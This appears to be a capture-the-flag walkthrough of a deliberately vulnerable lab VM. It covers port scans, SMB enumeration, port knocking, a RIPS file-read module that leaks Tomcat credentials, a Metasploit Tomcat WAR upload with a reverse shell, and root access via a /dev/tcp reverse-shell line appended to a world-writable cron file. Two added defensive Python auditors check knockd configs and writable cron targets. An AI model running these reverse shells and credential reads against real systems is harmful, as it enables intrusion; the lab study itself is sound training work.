# Lab setup
Download the VM and import it directly; it is ready to attack.
# Penetration process
# Initial reconnaissance
```
22/tcp   filtered ssh
53/tcp   open     domain
80/tcp   filtered http
110/tcp  open     pop3
139/tcp  open     netbios-ssn
143/tcp  open     imap
445/tcp  open     microsoft-ds
993/tcp  open     imaps
995/tcp  open     pop3s
8080/tcp open     http-proxy
```
Probed the SMB service for vulnerabilities first; nothing turned up.
Port 80 is filtered, and port 8080 has a web service, so probe that.
```
[05:02:42] 302 - 0B - /docs -> http://192.168.1.132:8080/docs/
[05:02:42] 200 - 18KB - /docs/
[05:02:46] 200 - 5KB - /examples/servlets/index.html
[05:02:46] 200 - 714B - /examples/servlets/servlet/CookieExample
[05:02:46] 200 - 1KB - /examples/
[05:02:46] 200 - 685B - /examples/jsp/snp/snoop.jsp
[05:02:46] 200 - 1KB - /examples/websocket/index.xhtml
[05:02:46] 302 - 0B - /examples -> http://192.168.1.132:8080/examples/
[05:02:46] 200 - 1KB - /examples/servlets/servlet/RequestHeaderExample
[05:02:46] 200 - 19KB - /examples/jsp/index.html
[05:02:53] 302 - 0B - /host-manager/ -> http://192.168.1.132:8080/host-manager/html
[05:02:53] 401 - 2KB - /host-manager/html
[05:03:03] 302 - 0B - /manager -> http://192.168.1.132:8080/manager/
[05:03:03] 302 - 0B - /manager/ -> http://192.168.1.132:8080/manager/html
[05:03:03] 401 - 2KB - /manager/html/
[05:03:04] 404 - 2KB - /manager/admin.asp
[05:03:04] 401 - 2KB - /manager/jmxproxy
[05:03:04] 401 - 2KB - /manager/jmxproxy/?invoke=BEANNAME&op=METHODNAME&ps=COMMASEPARATEDPARAMETERS
[05:03:04] 401 - 2KB - /manager/jmxproxy/?qry=STUFF
[05:03:04] 401 - 2KB - /manager/jmxproxy/?set=BEANNAME&att=MYATTRIBUTE&val=NEWVALUE
[05:03:04] 401 - 2KB - /manager/status/all
[05:03:04] 404 - 2KB - /manager/login.asp
[05:03:04] 401 - 2KB - /manager/jmxproxy/?get=java.lang:type=Memory&att=HeapMemoryUsage
[05:03:04] 404 - 2KB - /manager/VERSION
[05:03:03] 401 - 2KB - /manager/html
[05:03:04] 404 - 2KB - /manager/login
[05:03:04] 401 - 2KB - /manager/jmxproxy/?get=BEANNAME&att=MYATTRIBUTE&key=MYKEY
[05:03:04] 401 - 2KB - /manager/jmxproxy/?invoke=Catalina%3Atype%3DService&op=findConnectors&ps=
[05:03:23] 200 - 45B - /robots.txt
```
```
+ /robots.txt: contains 1 entry which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS .
+ HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /: Appears to be a default Apache Tomcat install.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2104
+ /manager/html: Default Tomcat Manager / Host Manager interface found.
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found.
+ /manager/status: Default Tomcat Server Status interface found.
```
robots.txt lists one directory; opening it gives a base64-encoded string, so decode it.
```
┌──(root㉿kali)-[~]
└─# echo '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' | base64 -d
It's annoying, but we repeat this over and over again: cyber hygiene is extremely important. Please stop setting silly passwords that will get cracked with any decent password list.
Once, we found the password "password", quite literally sticking on a post-it in front of an employee's desk! As silly as it may be, the employee pleaded for mercy when we threatened to fire her.
No fluffy bunnies for those who set insecure passwords and endanger the enterprise.
```
Aha, so some employee used "password" as their password.
Enumerate users over the Samba service with enum4linux.
```
S-1-5-21-3544418579-3748865642-433680629-501 MERCY\nobody (Local User)
S-1-5-21-3544418579-3748865642-433680629-513 MERCY\None (Domain Group)
S-1-5-21-3544418579-3748865642-433680629-1000 MERCY\pleadformercy (Local User)
S-1-5-21-3544418579-3748865642-433680629-1001 MERCY\qiu (Local User)
```
Combined with the other clues, the qiu user is most likely the one whose password leaked.
# File shares
Share listing:
```
//192.168.1.132/print$ Mapping: DENIED Listing: N/A Writing: N/A
//192.168.1.132/qiu    Mapping: DENIED Listing: N/A Writing: N/A
```
Access the qiu share and see what is in it.
```
┌──(root㉿kali)-[~/Desktop]
└─# smbclient -U qiu \\\\192.168.1.132\\qiu
Password for [WORKGROUP\qiu]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                 D        0  Fri Aug 31 15:07:00 2018
  ..                D        0  Mon Nov 19 11:59:09 2018
  .bashrc           H     3637  Sun Aug 26 09:19:34 2018
  .public          DH        0  Sun Aug 26 10:23:24 2018
  .bash_history     H      163  Fri Aug 31 15:11:34 2018
  .cache           DH        0  Fri Aug 31 14:22:05 2018
  .private         DH        0  Sun Aug 26 12:35:34 2018
  .bash_logout      H      220  Sun Aug 26 09:19:34 2018
  .profile          H      675  Sun Aug 26 09:19:34 2018

                19213004 blocks of size 1024. 16327616 blocks available
```
A look at .bash_history shows that a configprint file was executed; pull it down and take a look.
It writes the knock configuration and also syncs it into a config file.
So let's look at that config file.
```
Here are settings for your perusal.
Port Knocking Daemon Configuration
[options]
UseSyslog
[openHTTP]
sequence = 159,27391,4
seq_timeout = 100
command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
tcpflags = syn
[closeHTTP]
sequence = 4,27391,159
seq_timeout = 100
command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
tcpflags = syn
[openSSH]
sequence = 17301,28504,9999
seq_timeout = 100
command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
[closeSSH]
sequence = 9999,28504,17301
seq_timeout = 100
command = /sbin/iptables -D iNPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
```
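From the defender's side, a knockd.conf like the one recovered above is worth linting before it goes live: each open rule should have a close rule whose sequence is the exact reverse, the iptables chain name must be spelled correctly (chain names are case-sensitive, so the `iNPUT` in closeSSH makes that command fail and the port stays open), and an open rule without `cmd_timeout` relies entirely on the close knock. This is an added example, not code from the original writeup; the embedded config is a constructed excerpt of the recovered file with the two non-INI header sentences and the `seq_timeout` lines left out.

```python
import configparser
import re

# Constructed excerpt of the recovered knockd.conf (header sentences and
# seq_timeout lines omitted; the iNPUT typo in closeSSH is kept on purpose).
KNOCKD_CONF = """\
[openHTTP]
sequence = 159,27391,4
command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
tcpflags = syn
[closeHTTP]
sequence = 4,27391,159
command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
tcpflags = syn
[openSSH]
sequence = 17301,28504,9999
command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
[closeSSH]
sequence = 9999,28504,17301
command = /sbin/iptables -D iNPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
"""

BUILTIN_CHAINS = {"INPUT", "OUTPUT", "FORWARD"}


def parse_knockd(text):
    # interpolation=None keeps configparser from choking on the %IP% token
    cp = configparser.ConfigParser(allow_no_value=True, interpolation=None)
    cp.read_string(text)
    return {s: dict(cp[s]) for s in cp.sections() if s != "options"}


def audit_knockd(text):
    """Return a list of findings; an empty list means the config passed."""
    secs = parse_knockd(text)
    findings = []
    for name, sec in secs.items():
        chain = re.search(r"iptables\s+-[IAD]\s+(\S+)", sec.get("command", ""))
        if chain and chain.group(1) not in BUILTIN_CHAINS:
            findings.append(f"{name}: unknown iptables chain '{chain.group(1)}'")
        if name.startswith("open"):
            close = secs.get("close" + name[4:])
            if close is None or close.get("sequence", "").split(",") != sec["sequence"].split(",")[::-1]:
                findings.append(f"{name}: close sequence missing or not the reverse")
            if "cmd_timeout" not in sec:
                findings.append(f"{name}: no cmd_timeout, port stays open until the close knock")
    return findings
```

Run against the excerpt it reports the `iNPUT` chain plus the missing `cmd_timeout` on both open rules; fixing the typo leaves only the two timeout findings.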
The knock sequences are right there, so knock according to the rules to open HTTP and SSH.
# Opening ports with knock
```
knock 192.168.1.132 159 27391 4
knock 192.168.1.132 17301 28504 9999
```
SSH is open now, but trying to log in with the qiu account does not work.
So port 80 is all that is left.
# Port 80
```
[05:28:03] 200 - 67B - /login.html
[05:28:25] 200 - 50B - /robots.txt
```
```
User-agent: *
Disallow: /mercy
Disallow: /nomercy
```
/mercy gives a hint that seems to be about getting the system time; I did not understand it.
/nomercy is a CMS, RIPS.
Search for known vulnerabilities directly.
# Exploiting RIPS
It has a file inclusion vulnerability; just configure the module and run it.
```
msf6 auxiliary(scanner/http/rips_traversal) > show options

Module options (auxiliary/scanner/http/rips_traversal):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DEPTH      5                yes       Traversal Depth (to reach the root folder)
   FILEPATH   /etc/passwd      yes       The path to the file to read
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.132    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /nomercy/        yes       The URI path to the web application
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host

View the full module info with the info, or info -d command.
```
It can read the passwd file, so include the Tomcat configuration file for the port 8080 service to look for credentials: /etc/tomcat7/tomcat-users.xml
```xml
<role rolename="admin-gui"/>
<role rolename="manager-gui"/>
<user username="thisisasuperduperlonguser" password="heartbreakisinevitable" roles="admin-gui,manager-gui"/>
<user username="fluffy" password="freakishfluffybunny" roles="none"/>
</tomcat-users>
```
That yields two sets of credentials: thisisasuperduperlonguser/heartbreakisinevitable
and fluffy/freakishfluffybunny
# Tomcat WAR upload
Configure as follows and run:
```
msf6 exploit(multi/http/tomcat_mgr_upload) > show options

Module options (exploit/multi/http/tomcat_mgr_upload):

   Name          Current Setting            Required  Description
   ----          ---------------            --------  -----------
   HttpPassword  heartbreakisinevitable     no        The password for the specified username
   HttpUsername  thisisasuperduperlonguser  no        The username to authenticate as
   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS        192.168.1.132              yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT         8080                       yes       The target port (TCP)
   SSL           false                      no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /manager                   yes       The URI path of the manager app (/html/upload and /undeploy will be used)
   VHOST                                    no        HTTP server virtual host

Payload options (linux/x86/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   CMD    /bin/sh          yes       The command string to execute
   LHOST  192.168.1.129    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   2   Linux x86

View the full module info with the info, or info -d command.
```
That gives a shell as tomcat7.
# Privilege escalation
The fluffy account from earlier could not log in over SSH, but su to it works directly.
With a shell as fluffy, look around the home directory: /home/fluffy/.private/secrets
contains a timeclock file with 777 permissions, presumably run by a scheduled task, so append a reverse shell to it: `echo "bash -i >& /dev/tcp/192.168.1.129/8080 0>&1" >> timeclock`
Start a listener, wait, and a root shell comes back. Done.
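The root cause of that escalation is a root-run scheduled task pointing at a file anyone can modify. A host audit can catch this by walking a crontab and checking the mode of each command's program file. This is an added example, not part of the original writeup; the crontab text and the files it points at are constructed in a temporary directory, and the timeclock path is a hypothetical echo of the one found above.

```python
import os
import stat
import tempfile

# Constructed sample of a per-user root crontab (no user column, unlike /etc/crontab).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
* * * * * /home/fluffy/.private/secrets/timeclock
0 3 * * * /usr/local/sbin/backup.sh --quiet
"""


def cron_commands(text):
    """Yield the command field of every non-comment cron line (5 time fields, then command)."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)
        if len(fields) == 6:
            yield fields[5]


def writable_by_others(path):
    """True if group or world can write the file (mode 777 is the extreme case)."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_cron(text, root="/"):
    """Return the cron commands whose program file is group- or world-writable.

    root lets the check run against a chroot-like copy of the filesystem."""
    findings = []
    for cmd in cron_commands(text):
        prog = os.path.join(root, cmd.split()[0].lstrip("/"))
        if os.path.isfile(prog) and writable_by_others(prog):
            findings.append(cmd)
    return findings


def demo():
    """Create the two constructed scripts (one 777, one 755) under a temp root and audit."""
    with tempfile.TemporaryDirectory() as root:
        for rel, mode in (("home/fluffy/.private/secrets/timeclock", 0o777),
                          ("usr/local/sbin/backup.sh", 0o755)):
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as f:
                f.write("#!/bin/sh\n")
            os.chmod(path, mode)
        return audit_cron(SAMPLE_CRONTAB, root)
```

Running `demo()` flags only the timeclock entry; the 755 backup script passes.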
# Summary
When spawning the reverse shell I tried two commands; in theory both should have worked, but they did not.
Writing `/bin/bash -i > /dev/tcp/192.168.1.129/443 0<& 2>&1`
into timeclock did not give a callback.
It may be related to the shell being incomplete. If anyone knows, ping me.